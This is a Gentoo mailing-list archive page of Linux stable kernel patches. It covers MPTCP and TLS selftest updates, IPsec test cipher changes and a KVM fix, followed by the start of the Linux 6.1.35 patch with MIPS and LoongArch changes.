+@@ -3014,8 +3154,10 @@ userspace_tests()
+ 
+ endpoint_tests()
+ {
++	# subflow_rebuild_header is needed to support the implicit flag
+ 	# userspace pm type prevents add_addr
+-	if reset "implicit EP"; then
++	if reset "implicit EP" &&
++	   mptcp_lib_kallsyms_has "subflow_rebuild_header$"; then
+ 		pm_nl_set_limits $ns1 2 2
+ 		pm_nl_set_limits $ns2 2 2
+ 		pm_nl_add_endpoint $ns1 10.0.2.1 flags signal
+@@ -3035,7 +3177,8 @@ endpoint_tests()
+ 		kill_tests_wait
+ 	fi
+ 
+-	if reset "delete and re-add"; then
++	if reset "delete and re-add" &&
++	   mptcp_lib_kallsyms_has "subflow_rebuild_header$"; then
+ 		pm_nl_set_limits $ns1 1 1
+ 		pm_nl_set_limits $ns2 1 1
+ 		pm_nl_add_endpoint $ns2 10.0.2.2 id 2 dev ns2eth2 flags subflow
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_lib.sh b/tools/testing/selftests/net/mptcp/mptcp_lib.sh
+index 3286536b79d55..f32045b23b893 100644
+--- a/tools/testing/selftests/net/mptcp/mptcp_lib.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_lib.sh
+@@ -38,3 +38,67 @@ mptcp_lib_check_mptcp() {
+ 		exit ${KSFT_SKIP}
+ 	fi
+ }
++
++mptcp_lib_check_kallsyms() {
++	if ! mptcp_lib_has_file "/proc/kallsyms"; then
++		echo "SKIP: CONFIG_KALLSYMS is missing"
++		exit ${KSFT_SKIP}
++	fi
++}
++
++# Internal: use mptcp_lib_kallsyms_has() instead
++__mptcp_lib_kallsyms_has() {
++	local sym="${1}"
++
++	mptcp_lib_check_kallsyms
++
++	grep -q " ${sym}" /proc/kallsyms
++}
++
++# $1: part of a symbol to look at, add '$' at the end for full name
++mptcp_lib_kallsyms_has() {
++	local sym="${1}"
++
++	if __mptcp_lib_kallsyms_has "${sym}"; then
++		return 0
++	fi
++
++	mptcp_lib_fail_if_expected_feature "${sym} symbol not found"
++}
++
++# $1: part of a symbol to look at, add '$' at the end for full name
++mptcp_lib_kallsyms_doesnt_have() {
++	local sym="${1}"
++
++	if ! __mptcp_lib_kallsyms_has "${sym}"; then
++		return 0
++	fi
++
++	mptcp_lib_fail_if_expected_feature "${sym} symbol has been found"
++}
++
++# !!!AVOID USING THIS!!!
++# Features might not land in the expected version and features can be backported
++#
++# $1: kernel version, e.g. 6.3
++mptcp_lib_kversion_ge() {
++	local exp_maj="${1%.*}"
++	local exp_min="${1#*.}"
++	local v maj min
++
++	# If the kernel has backported features, set this env var to 1:
++	if [ "${SELFTESTS_MPTCP_LIB_NO_KVERSION_CHECK:-}" = "1" ]; then
++		return 0
++	fi
++
++	v=$(uname -r | cut -d'.' -f1,2)
++	maj=${v%.*}
++	min=${v#*.}
++
++	if   [ "${maj}" -gt "${exp_maj}" ] ||
++	   { [ "${maj}" -eq "${exp_maj}" ] && [ "${min}" -ge "${exp_min}" ]; }; then
++		return 0
++	fi
++
++	mptcp_lib_fail_if_expected_feature "kernel version ${1} lower than ${v}"
++}
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_sockopt.c b/tools/testing/selftests/net/mptcp/mptcp_sockopt.c
+index ae61f39556ca8..b35148edbf024 100644
+--- a/tools/testing/selftests/net/mptcp/mptcp_sockopt.c
++++ b/tools/testing/selftests/net/mptcp/mptcp_sockopt.c
+@@ -87,6 +87,10 @@ struct so_state {
+ 	uint64_t tcpi_rcv_delta;
+ };
+ 
++#ifndef MIN
++#define MIN(a, b) ((a) < (b) ? (a) : (b))
++#endif
++
+ static void die_perror(const char *msg)
+ {
+ 	perror(msg);
+@@ -349,13 +353,14 @@ static void do_getsockopt_tcp_info(struct so_state *s, int fd, size_t r, size_t
+ 			xerror("getsockopt MPTCP_TCPINFO (tries %d, %m)");
+ 
+ 		assert(olen <= sizeof(ti));
+-		assert(ti.d.size_user == ti.d.size_kernel);
+-		assert(ti.d.size_user == sizeof(struct tcp_info));
++		assert(ti.d.size_kernel > 0);
++		assert(ti.d.size_user ==
++		       MIN(ti.d.size_kernel, sizeof(struct tcp_info)));
+ 		assert(ti.d.num_subflows == 1);
+ 
+ 		assert(olen > (socklen_t)sizeof(struct mptcp_subflow_data));
+ 		olen -= sizeof(struct mptcp_subflow_data);
+-		assert(olen == sizeof(struct tcp_info));
++		assert(olen == ti.d.size_user);
+ 
+ 		if (ti.ti[0].tcpi_bytes_sent == w &&
+ 		    ti.ti[0].tcpi_bytes_received == r)
+@@ -401,13 +406,14 @@ static void do_getsockopt_subflow_addrs(int fd)
+ 		die_perror("getsockopt MPTCP_SUBFLOW_ADDRS");
+ 
+ 	assert(olen <= sizeof(addrs));
+-	assert(addrs.d.size_user == addrs.d.size_kernel);
+-	assert(addrs.d.size_user == sizeof(struct mptcp_subflow_addrs));
++	assert(addrs.d.size_kernel > 0);
++	assert(addrs.d.size_user ==
++	       MIN(addrs.d.size_kernel, sizeof(struct mptcp_subflow_addrs)));
+ 	assert(addrs.d.num_subflows == 1);
+ 
+ 	assert(olen > (socklen_t)sizeof(struct mptcp_subflow_data));
+ 	olen -= sizeof(struct mptcp_subflow_data);
+-	assert(olen == sizeof(struct mptcp_subflow_addrs));
++	assert(olen == addrs.d.size_user);
+ 
+ 	llen = sizeof(local);
+ 	ret = getsockname(fd, (struct sockaddr *)&local, &llen);
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_sockopt.sh b/tools/testing/selftests/net/mptcp/mptcp_sockopt.sh
+index 08d8533c98c45..a493eaf8633fc 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_sockopt.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_sockopt.sh
+@@ -84,6 +84,7 @@ cleanup()
+ }
+ 
+ mptcp_lib_check_mptcp
++mptcp_lib_check_kallsyms
+ 
+ ip -Version > /dev/null 2>&1
+ if [ $? -ne 0 ];then
+@@ -181,9 +182,14 @@ do_transfer()
+ 		local_addr="0.0.0.0"
+ 	fi
+ 
++	cmsg="TIMESTAMPNS"
++	if mptcp_lib_kallsyms_has "mptcp_ioctl$"; then
++		cmsg+=",TCPINQ"
++	fi
++
+ 	timeout ${timeout_test} \
+ 		ip netns exec ${listener_ns} \
+-			$mptcp_connect -t ${timeout_poll} -l -M 1 -p $port -s ${srv_proto} -c TIMESTAMPNS,TCPINQ \
++			$mptcp_connect -t ${timeout_poll} -l -M 1 -p $port -s ${srv_proto} -c "${cmsg}" \
+ 				${local_addr} < "$sin" > "$sout" &
+ 	spid=$!
+ 
+@@ -191,7 +197,7 @@ do_transfer()
+ 
+ 	timeout ${timeout_test} \
+ 		ip netns exec ${connector_ns} \
+-			$mptcp_connect -t ${timeout_poll} -M 2 -p $port -s ${cl_proto} -c TIMESTAMPNS,TCPINQ \
++			$mptcp_connect -t ${timeout_poll} -M 2 -p $port -s ${cl_proto} -c "${cmsg}" \
+ 				$connect_addr < "$cin" > "$cout" &
+ 
+ 	cpid=$!
+@@ -248,6 +254,11 @@ do_mptcp_sockopt_tests()
+ {
+ 	local lret=0
+ 
++	if ! mptcp_lib_kallsyms_has "mptcp_diag_fill_info$"; then
++		echo "INFO: MPTCP sockopt not supported: SKIP"
++		return
++	fi
++
+ 	ip netns exec "$ns_sbox" ./mptcp_sockopt
+ 	lret=$?
+ 
+@@ -305,6 +316,11 @@ do_tcpinq_tests()
+ 	ip netns exec "$ns1" iptables -F
+ 	ip netns exec "$ns1" ip6tables -F
+ 
++	if ! mptcp_lib_kallsyms_has "mptcp_ioctl$"; then
++		echo "INFO: TCP_INQ not supported: SKIP"
++		return
++	fi
++
+ 	for args in "-t tcp" "-r tcp"; do
+ 		do_tcpinq_test $args
+ 		lret=$?
+diff --git a/tools/testing/selftests/net/mptcp/pm_netlink.sh b/tools/testing/selftests/net/mptcp/pm_netlink.sh
+index 32f7533e0919a..d02e0d63a8f91 100755
+--- a/tools/testing/selftests/net/mptcp/pm_netlink.sh
++++ b/tools/testing/selftests/net/mptcp/pm_netlink.sh
+@@ -73,8 +73,12 @@ check()
+ }
+ 
+ check "ip netns exec $ns1 ./pm_nl_ctl dump" "" "defaults addr list"
+-check "ip netns exec $ns1 ./pm_nl_ctl limits" "accept 0
++
++default_limits="$(ip netns exec $ns1 ./pm_nl_ctl limits)"
++if mptcp_lib_expect_all_features; then
++	check "ip netns exec $ns1 ./pm_nl_ctl limits" "accept 0
+ subflows 2" "defaults limits"
++fi
+ 
+ ip netns exec $ns1 ./pm_nl_ctl add 10.0.1.1
+ ip netns exec $ns1 ./pm_nl_ctl add 10.0.1.2 flags subflow dev lo
+@@ -121,12 +125,10 @@ ip netns exec $ns1 ./pm_nl_ctl flush
+ check "ip netns exec $ns1 ./pm_nl_ctl dump" "" "flush addrs"
+ 
+ ip netns exec $ns1 ./pm_nl_ctl limits 9 1
+-check "ip netns exec $ns1 ./pm_nl_ctl limits" "accept 0
+-subflows 2" "rcv addrs above hard limit"
++check "ip netns exec $ns1 ./pm_nl_ctl limits" "$default_limits" "rcv addrs above hard limit"
+ 
+ ip netns exec $ns1 ./pm_nl_ctl limits 1 9
+-check "ip netns exec $ns1 ./pm_nl_ctl limits" "accept 0
+-subflows 2" "subflows above hard limit"
++check "ip netns exec $ns1 ./pm_nl_ctl limits" "$default_limits" "subflows above hard limit"
+ 
+ ip netns exec $ns1 ./pm_nl_ctl limits 8 8
+ check "ip netns exec $ns1 ./pm_nl_ctl limits" "accept 8
+@@ -176,14 +178,19 @@ subflow,backup 10.0.1.1" "set flags (backup)"
+ ip netns exec $ns1 ./pm_nl_ctl set 10.0.1.1 flags nobackup
+ check "ip netns exec $ns1 ./pm_nl_ctl dump" "id 1 flags \
+ subflow 10.0.1.1" "          (nobackup)"
++
++# fullmesh support has been added later
+ ip netns exec $ns1 ./pm_nl_ctl set id 1 flags fullmesh
+-check "ip netns exec $ns1 ./pm_nl_ctl dump" "id 1 flags \
++if ip netns exec $ns1 ./pm_nl_ctl dump | grep -q "fullmesh" ||
++   mptcp_lib_expect_all_features; then
++	check "ip netns exec $ns1 ./pm_nl_ctl dump" "id 1 flags \
+ subflow,fullmesh 10.0.1.1" "          (fullmesh)"
+-ip netns exec $ns1 ./pm_nl_ctl set id 1 flags nofullmesh
+-check "ip netns exec $ns1 ./pm_nl_ctl dump" "id 1 flags \
++	ip netns exec $ns1 ./pm_nl_ctl set id 1 flags nofullmesh
++	check "ip netns exec $ns1 ./pm_nl_ctl dump" "id 1 flags \
+ subflow 10.0.1.1" "          (nofullmesh)"
+-ip netns exec $ns1 ./pm_nl_ctl set id 1 flags backup,fullmesh
+-check "ip netns exec $ns1 ./pm_nl_ctl dump" "id 1 flags \
++	ip netns exec $ns1 ./pm_nl_ctl set id 1 flags backup,fullmesh
++	check "ip netns exec $ns1 ./pm_nl_ctl dump" "id 1 flags \
+ subflow,backup,fullmesh 10.0.1.1" "          (backup,fullmesh)"
++fi
+ 
+ exit $ret
+diff --git a/tools/testing/selftests/net/mptcp/userspace_pm.sh b/tools/testing/selftests/net/mptcp/userspace_pm.sh
+index 084a2b0a197ec..eb0f4f6afebd3 100755
+--- a/tools/testing/selftests/net/mptcp/userspace_pm.sh
++++ b/tools/testing/selftests/net/mptcp/userspace_pm.sh
+@@ -5,10 +5,15 @@
+ 
+ mptcp_lib_check_mptcp
+ 
++if ! mptcp_lib_has_file '/proc/sys/net/mptcp/pm_type'; then
++	echo "userspace pm tests are not supported by the kernel: SKIP"
++	exit ${KSFT_SKIP}
++fi
++
+ ip -Version > /dev/null 2>&1
+ if [ $? -ne 0 ];then
+ 	echo "SKIP: Cannot not run test without ip tool"
+-	exit 1
++	exit ${KSFT_SKIP}
+ fi
+ 
+ ANNOUNCED=6        # MPTCP_EVENT_ANNOUNCED
+diff --git a/tools/testing/selftests/net/tls.c b/tools/testing/selftests/net/tls.c
+index 2cbb12736596d..c0ad8385441f2 100644
+--- a/tools/testing/selftests/net/tls.c
++++ b/tools/testing/selftests/net/tls.c
+@@ -25,6 +25,8 @@
+ #define TLS_PAYLOAD_MAX_LEN 16384
+ #define SOL_TLS 282
+ 
++static int fips_enabled;
++
+ struct tls_crypto_info_keys {
+ 	union {
+ 		struct tls12_crypto_info_aes_gcm_128 aes128;
+@@ -235,7 +237,7 @@ FIXTURE_VARIANT(tls)
+ {
+ 	uint16_t tls_version;
+ 	uint16_t cipher_type;
+-	bool nopad;
++	bool nopad, fips_non_compliant;
+ };
+ 
+ FIXTURE_VARIANT_ADD(tls, 12_aes_gcm)
+@@ -254,24 +256,28 @@ FIXTURE_VARIANT_ADD(tls, 12_chacha)
+ {
+ 	.tls_version = TLS_1_2_VERSION,
+ 	.cipher_type = TLS_CIPHER_CHACHA20_POLY1305,
++	.fips_non_compliant = true,
+ };
+ 
+ FIXTURE_VARIANT_ADD(tls, 13_chacha)
+ {
+ 	.tls_version = TLS_1_3_VERSION,
+ 	.cipher_type = TLS_CIPHER_CHACHA20_POLY1305,
++	.fips_non_compliant = true,
+ };
+ 
+ FIXTURE_VARIANT_ADD(tls, 13_sm4_gcm)
+ {
+ 	.tls_version = TLS_1_3_VERSION,
+ 	.cipher_type = TLS_CIPHER_SM4_GCM,
++	.fips_non_compliant = true,
+ };
+ 
+ FIXTURE_VARIANT_ADD(tls, 13_sm4_ccm)
+ {
+ 	.tls_version = TLS_1_3_VERSION,
+ 	.cipher_type = TLS_CIPHER_SM4_CCM,
++	.fips_non_compliant = true,
+ };
+ 
+ FIXTURE_VARIANT_ADD(tls, 12_aes_ccm)
+@@ -311,6 +317,9 @@ FIXTURE_SETUP(tls)
+ 	int one = 1;
+ 	int ret;
+ 
++	if (fips_enabled && variant->fips_non_compliant)
++		SKIP(return, "Unsupported cipher in FIPS mode");
++
+ 	tls_crypto_info_init(variant->tls_version, variant->cipher_type,
+ 			     &tls12);
+ 
+@@ -1820,4 +1829,17 @@ TEST(tls_v6ops) {
+ 	close(sfd);
+ }
+ 
++static void __attribute__((constructor)) fips_check(void) {
++	int res;
++	FILE *f;
++
++	f = fopen("/proc/sys/crypto/fips_enabled", "r");
++	if (f) {
++		res = fscanf(f, "%d", &fips_enabled);
++		if (res != 1)
++			ksft_print_msg("ERROR: Couldn't read /proc/sys/crypto/fips_enabled\n");
++		fclose(f);
++	}
++}
++
+ TEST_HARNESS_MAIN
+diff --git a/tools/testing/selftests/net/vrf-xfrm-tests.sh b/tools/testing/selftests/net/vrf-xfrm-tests.sh
+index 184da81f554ff..452638ae8aed8 100755
+--- a/tools/testing/selftests/net/vrf-xfrm-tests.sh
++++ b/tools/testing/selftests/net/vrf-xfrm-tests.sh
+@@ -264,60 +264,60 @@ setup_xfrm()
+ 	ip -netns host1 xfrm state add src ${HOST1_4} dst ${HOST2_4} \
+ 	    proto esp spi ${SPI_1} reqid 0 mode tunnel \
+ 	    replay-window 4 replay-oseq 0x4 \
+-	    auth-trunc 'hmac(md5)' ${AUTH_1} 96 \
+-	    enc 'cbc(des3_ede)' ${ENC_1} \
++	    auth-trunc 'hmac(sha1)' ${AUTH_1} 96 \
++	    enc 'cbc(aes)' ${ENC_1} \
+ 	    sel src ${h1_4} dst ${h2_4} ${devarg}
+ 
+ 	ip -netns host2 xfrm state add src ${HOST1_4} dst ${HOST2_4} \
+ 	    proto esp spi ${SPI_1} reqid 0 mode tunnel \
+ 	    replay-window 4 replay-oseq 0x4 \
+-	    auth-trunc 'hmac(md5)' ${AUTH_1} 96 \
+-	    enc 'cbc(des3_ede)' ${ENC_1} \
++	    auth-trunc 'hmac(sha1)' ${AUTH_1} 96 \
++	    enc 'cbc(aes)' ${ENC_1} \
+ 	    sel src ${h1_4} dst ${h2_4}
+ 
+ 
+ 	ip -netns host1 xfrm state add src ${HOST2_4} dst ${HOST1_4} \
+ 	    proto esp spi ${SPI_2} reqid 0 mode tunnel \
+ 	    replay-window 4 replay-oseq 0x4 \
+-	    auth-trunc 'hmac(md5)' ${AUTH_2} 96 \
+-	    enc 'cbc(des3_ede)' ${ENC_2} \
++	    auth-trunc 'hmac(sha1)' ${AUTH_2} 96 \
++	    enc 'cbc(aes)' ${ENC_2} \
+ 	    sel src ${h2_4} dst ${h1_4} ${devarg}
+ 
+ 	ip -netns host2 xfrm state add src ${HOST2_4} dst ${HOST1_4} \
+ 	    proto esp spi ${SPI_2} reqid 0 mode tunnel \
+ 	    replay-window 4 replay-oseq 0x4 \
+-	    auth-trunc 'hmac(md5)' ${AUTH_2} 96 \
+-	    enc 'cbc(des3_ede)' ${ENC_2} \
++	    auth-trunc 'hmac(sha1)' ${AUTH_2} 96 \
++	    enc 'cbc(aes)' ${ENC_2} \
+ 	    sel src ${h2_4} dst ${h1_4}
+ 
+ 
+ 	ip -6 -netns host1 xfrm state add src ${HOST1_6} dst ${HOST2_6} \
+ 	    proto esp spi ${SPI_1} reqid 0 mode tunnel \
+ 	    replay-window 4 replay-oseq 0x4 \
+-	    auth-trunc 'hmac(md5)' ${AUTH_1} 96 \
+-	    enc 'cbc(des3_ede)' ${ENC_1} \
++	    auth-trunc 'hmac(sha1)' ${AUTH_1} 96 \
++	    enc 'cbc(aes)' ${ENC_1} \
+ 	    sel src ${h1_6} dst ${h2_6} ${devarg}
+ 
+ 	ip -6 -netns host2 xfrm state add src ${HOST1_6} dst ${HOST2_6} \
+ 	    proto esp spi ${SPI_1} reqid 0 mode tunnel \
+ 	    replay-window 4 replay-oseq 0x4 \
+-	    auth-trunc 'hmac(md5)' ${AUTH_1} 96 \
+-	    enc 'cbc(des3_ede)' ${ENC_1} \
++	    auth-trunc 'hmac(sha1)' ${AUTH_1} 96 \
++	    enc 'cbc(aes)' ${ENC_1} \
+ 	    sel src ${h1_6} dst ${h2_6}
+ 
+ 
+ 	ip -6 -netns host1 xfrm state add src ${HOST2_6} dst ${HOST1_6} \
+ 	    proto esp spi ${SPI_2} reqid 0 mode tunnel \
+ 	    replay-window 4 replay-oseq 0x4 \
+-	    auth-trunc 'hmac(md5)' ${AUTH_2} 96 \
+-	    enc 'cbc(des3_ede)' ${ENC_2} \
++	    auth-trunc 'hmac(sha1)' ${AUTH_2} 96 \
++	    enc 'cbc(aes)' ${ENC_2} \
+ 	    sel src ${h2_6} dst ${h1_6} ${devarg}
+ 
+ 	ip -6 -netns host2 xfrm state add src ${HOST2_6} dst ${HOST1_6} \
+ 	    proto esp spi ${SPI_2} reqid 0 mode tunnel \
+ 	    replay-window 4 replay-oseq 0x4 \
+-	    auth-trunc 'hmac(md5)' ${AUTH_2} 96 \
+-	    enc 'cbc(des3_ede)' ${ENC_2} \
++	    auth-trunc 'hmac(sha1)' ${AUTH_2} 96 \
++	    enc 'cbc(aes)' ${ENC_2} \
+ 	    sel src ${h2_6} dst ${h1_6}
+ }
+ 
+diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
+index de8e5eb6af106..640113f047efb 100644
+--- a/virt/kvm/kvm_main.c
++++ b/virt/kvm/kvm_main.c
+@@ -691,6 +691,24 @@ static __always_inline int kvm_handle_hva_range_no_flush(struct mmu_notifier *mn
+ 
+ 	return __kvm_handle_hva_range(kvm, &range);
+ }
++
++static bool kvm_change_spte_gfn(struct kvm *kvm, struct kvm_gfn_range *range)
++{
++	/*
++	 * Skipping invalid memslots is correct if and only change_pte() is
++	 * surrounded by invalidate_range_{start,end}(), which is currently
++	 * guaranteed by the primary MMU.  If that ever changes, KVM needs to
++	 * unmap the memslot instead of skipping the memslot to ensure that KVM
++	 * doesn't hold references to the old PFN.
++	 */
++	WARN_ON_ONCE(!READ_ONCE(kvm->mn_active_invalidate_count));
++
++	if (range->slot->flags & KVM_MEMSLOT_INVALID)
++		return false;
++
++	return kvm_set_spte_gfn(kvm, range);
++}
++
+ static void kvm_mmu_notifier_change_pte(struct mmu_notifier *mn,
+ 					struct mm_struct *mm,
+ 					unsigned long address,
+@@ -712,7 +730,7 @@ static void kvm_mmu_notifier_change_pte(struct mmu_notifier *mn,
+ 	if (!READ_ONCE(kvm->mmu_invalidate_in_progress))
+ 		return;
+ 
+-	kvm_handle_hva_range(mn, address, address + 1, pte, kvm_set_spte_gfn);
++	kvm_handle_hva_range(mn, address, address + 1, pte, kvm_change_spte_gfn);
+ }
+ 
+ void kvm_mmu_invalidate_begin(struct kvm *kvm, unsigned long start,


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-06-21 14:54 Alice Ferrazzi
  0 siblings, 0 replies; 161+ messages in thread
From: Alice Ferrazzi @ 2023-06-21 14:54 UTC (permalink / raw
  To: gentoo-commits

commit:     9b543717224e51619b17ed59a27e279386aa5d97
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Wed Jun 21 14:53:57 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Wed Jun 21 14:53:57 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=9b543717

Linux patch 6.1.35

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README             |    8 +
 1034_linux-6.1.35.patch | 6966 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 6974 insertions(+)

diff --git a/0000_README b/0000_README
index 7c3280f5..077b20d6 100644
--- a/0000_README
+++ b/0000_README
@@ -159,6 +159,10 @@ Patch:  1028_linux-6.1.29.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.29
 
+Patch:  1029_linux-6.1.30.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.30
+
 Patch:  1030_linux-6.1.31.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.31
@@ -175,6 +179,10 @@ Patch:  1033_linux-6.1.34.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.34
 
+Patch:  1034_linux-6.1.35.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.35
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1034_linux-6.1.35.patch b/1034_linux-6.1.35.patch
new file mode 100644
index 00000000..60842e88
--- /dev/null
+++ b/1034_linux-6.1.35.patch
@@ -0,0 +1,6966 @@
+diff --git a/Makefile b/Makefile
+index bc7cc17b0e759..46c06af912d9d 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 34
++SUBLEVEL = 35
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/vexpress-v2p-ca5s.dts b/arch/arm/boot/dts/vexpress-v2p-ca5s.dts
+index 3b88209bacea2..ff1f9a1bcfcfc 100644
+--- a/arch/arm/boot/dts/vexpress-v2p-ca5s.dts
++++ b/arch/arm/boot/dts/vexpress-v2p-ca5s.dts
+@@ -132,6 +132,7 @@
+ 		reg = <0x2c0f0000 0x1000>;
+ 		interrupts = <0 84 4>;
+ 		cache-level = <2>;
++		cache-unified;
+ 	};
+ 
+ 	pmu {
+diff --git a/arch/loongarch/kernel/perf_event.c b/arch/loongarch/kernel/perf_event.c
+index 707bd32e5c4ff..3a2edb157b65a 100644
+--- a/arch/loongarch/kernel/perf_event.c
++++ b/arch/loongarch/kernel/perf_event.c
+@@ -271,7 +271,7 @@ static void loongarch_pmu_enable_event(struct hw_perf_event *evt, int idx)
+ 	WARN_ON(idx < 0 || idx >= loongarch_pmu.num_counters);
+ 
+ 	/* Make sure interrupt enabled. */
+-	cpuc->saved_ctrl[idx] = M_PERFCTL_EVENT(evt->event_base & 0xff) |
++	cpuc->saved_ctrl[idx] = M_PERFCTL_EVENT(evt->event_base) |
+ 		(evt->config_base & M_PERFCTL_CONFIG_MASK) | CSR_PERFCTRL_IE;
+ 
+ 	cpu = (event->cpu >= 0) ? event->cpu : smp_processor_id();
+@@ -594,7 +594,7 @@ static struct pmu pmu = {
+ 
+ static unsigned int loongarch_pmu_perf_event_encode(const struct loongarch_perf_event *pev)
+ {
+-	return (pev->event_id & 0xff);
++	return M_PERFCTL_EVENT(pev->event_id);
+ }
+ 
+ static const struct loongarch_perf_event *loongarch_pmu_map_general_event(int idx)
+@@ -849,7 +849,7 @@ static void resume_local_counters(void)
+ 
+ static const struct loongarch_perf_event *loongarch_pmu_map_raw_event(u64 config)
+ {
+-	raw_event.event_id = config & 0xff;
++	raw_event.event_id = M_PERFCTL_EVENT(config);
+ 
+ 	return &raw_event;
+ }
+diff --git a/arch/mips/Kconfig b/arch/mips/Kconfig
+index b26b77673c2cc..2f5835e300a8f 100644
+--- a/arch/mips/Kconfig
++++ b/arch/mips/Kconfig
+@@ -82,6 +82,7 @@ config MIPS
+ 	select HAVE_LD_DEAD_CODE_DATA_ELIMINATION
+ 	select HAVE_MOD_ARCH_SPECIFIC
+ 	select HAVE_NMI
++	select HAVE_PATA_PLATFORM
+ 	select HAVE_PERF_EVENTS
+ 	select HAVE_PERF_REGS
+ 	select HAVE_PERF_USER_STACK_DUMP
+diff --git a/arch/mips/Makefile b/arch/mips/Makefile
+index b296e33f8e333..85d3c3b4b7bdc 100644
+--- a/arch/mips/Makefile
++++ b/arch/mips/Makefile
+@@ -109,7 +109,7 @@ endif
+ # (specifically newer than 2.24.51.20140728) we then also need to explicitly
+ # set ".set hardfloat" in all files which manipulate floating point registers.
+ #
+-ifneq ($(call as-option,-Wa$(comma)-msoft-float,),)
++ifneq ($(call cc-option,$(cflags-y) -Wa$(comma)-msoft-float,),)
+ 	cflags-y		+= -DGAS_HAS_SET_HARDFLOAT -Wa,-msoft-float
+ endif
+ 
+@@ -152,7 +152,7 @@ cflags-y += -fno-stack-check
+ #
+ # Avoid this by explicitly disabling that assembler behaviour.
+ #
+-cflags-y += $(call as-option,-Wa$(comma)-mno-fix-loongson3-llsc,)
++cflags-y += $(call cc-option,-Wa$(comma)-mno-fix-loongson3-llsc,)
+ 
+ #
+ # CPU-dependent compiler/assembler options for optimization.
+diff --git a/arch/mips/alchemy/common/dbdma.c b/arch/mips/alchemy/common/dbdma.c
+index 5ab0430004092..6a3c890f7bbfe 100644
+--- a/arch/mips/alchemy/common/dbdma.c
++++ b/arch/mips/alchemy/common/dbdma.c
+@@ -30,6 +30,7 @@
+  *
+  */
+ 
++#include <linux/dma-map-ops.h> /* for dma_default_coherent */
+ #include <linux/init.h>
+ #include <linux/kernel.h>
+ #include <linux/slab.h>
+@@ -623,17 +624,18 @@ u32 au1xxx_dbdma_put_source(u32 chanid, dma_addr_t buf, int nbytes, u32 flags)
+ 		dp->dscr_cmd0 &= ~DSCR_CMD0_IE;
+ 
+ 	/*
+-	 * There is an errata on the Au1200/Au1550 parts that could result
+-	 * in "stale" data being DMA'ed. It has to do with the snoop logic on
+-	 * the cache eviction buffer.  DMA_NONCOHERENT is on by default for
+-	 * these parts. If it is fixed in the future, these dma_cache_inv will
+-	 * just be nothing more than empty macros. See io.h.
++	 * There is an erratum on certain Au1200/Au1550 revisions that could
++	 * result in "stale" data being DMA'ed. It has to do with the snoop
++	 * logic on the cache eviction buffer.  dma_default_coherent is set
++	 * to false on these parts.
+ 	 */
+-	dma_cache_wback_inv((unsigned long)buf, nbytes);
++	if (!dma_default_coherent)
++		dma_cache_wback_inv(KSEG0ADDR(buf), nbytes);
+ 	dp->dscr_cmd0 |= DSCR_CMD0_V;	/* Let it rip */
+ 	wmb(); /* drain writebuffer */
+ 	dma_cache_wback_inv((unsigned long)dp, sizeof(*dp));
+ 	ctp->chan_ptr->ddma_dbell = 0;
++	wmb(); /* force doorbell write out to dma engine */
+ 
+ 	/* Get next descriptor pointer. */
+ 	ctp->put_ptr = phys_to_virt(DSCR_GET_NXTPTR(dp->dscr_nxtptr));
+@@ -685,17 +687,18 @@ u32 au1xxx_dbdma_put_dest(u32 chanid, dma_addr_t buf, int nbytes, u32 flags)
+ 			  dp->dscr_source1, dp->dscr_dest0, dp->dscr_dest1);
+ #endif
+ 	/*
+-	 * There is an errata on the Au1200/Au1550 parts that could result in
+-	 * "stale" data being DMA'ed. It has to do with the snoop logic on the
+-	 * cache eviction buffer.  DMA_NONCOHERENT is on by default for these
+-	 * parts. If it is fixed in the future, these dma_cache_inv will just
+-	 * be nothing more than empty macros. See io.h.
++	 * There is an erratum on certain Au1200/Au1550 revisions that could
++	 * result in "stale" data being DMA'ed. It has to do with the snoop
++	 * logic on the cache eviction buffer.  dma_default_coherent is set
++	 * to false on these parts.
+ 	 */
+-	dma_cache_inv((unsigned long)buf, nbytes);
++	if (!dma_default_coherent)
++		dma_cache_inv(KSEG0ADDR(buf), nbytes);
+ 	dp->dscr_cmd0 |= DSCR_CMD0_V;	/* Let it rip */
+ 	wmb(); /* drain writebuffer */
+ 	dma_cache_wback_inv((unsigned long)dp, sizeof(*dp));
+ 	ctp->chan_ptr->ddma_dbell = 0;
++	wmb(); /* force doorbell write out to dma engine */
+ 
+ 	/* Get next descriptor pointer. */
+ 	ctp->put_ptr = phys_to_virt(DSCR_GET_NXTPTR(dp->dscr_nxtptr));
+diff --git a/arch/mips/kernel/cpu-probe.c b/arch/mips/kernel/cpu-probe.c
+index 7ddf07f255f32..6f5d825958778 100644
+--- a/arch/mips/kernel/cpu-probe.c
++++ b/arch/mips/kernel/cpu-probe.c
+@@ -1502,6 +1502,10 @@ static inline void cpu_probe_alchemy(struct cpuinfo_mips *c, unsigned int cpu)
+ 			break;
+ 		}
+ 		break;
++	case PRID_IMP_NETLOGIC_AU13XX:
++		c->cputype = CPU_ALCHEMY;
++		__cpu_name[cpu] = "Au1300";
++		break;
+ 	}
+ }
+ 
+@@ -1861,6 +1865,7 @@ void cpu_probe(void)
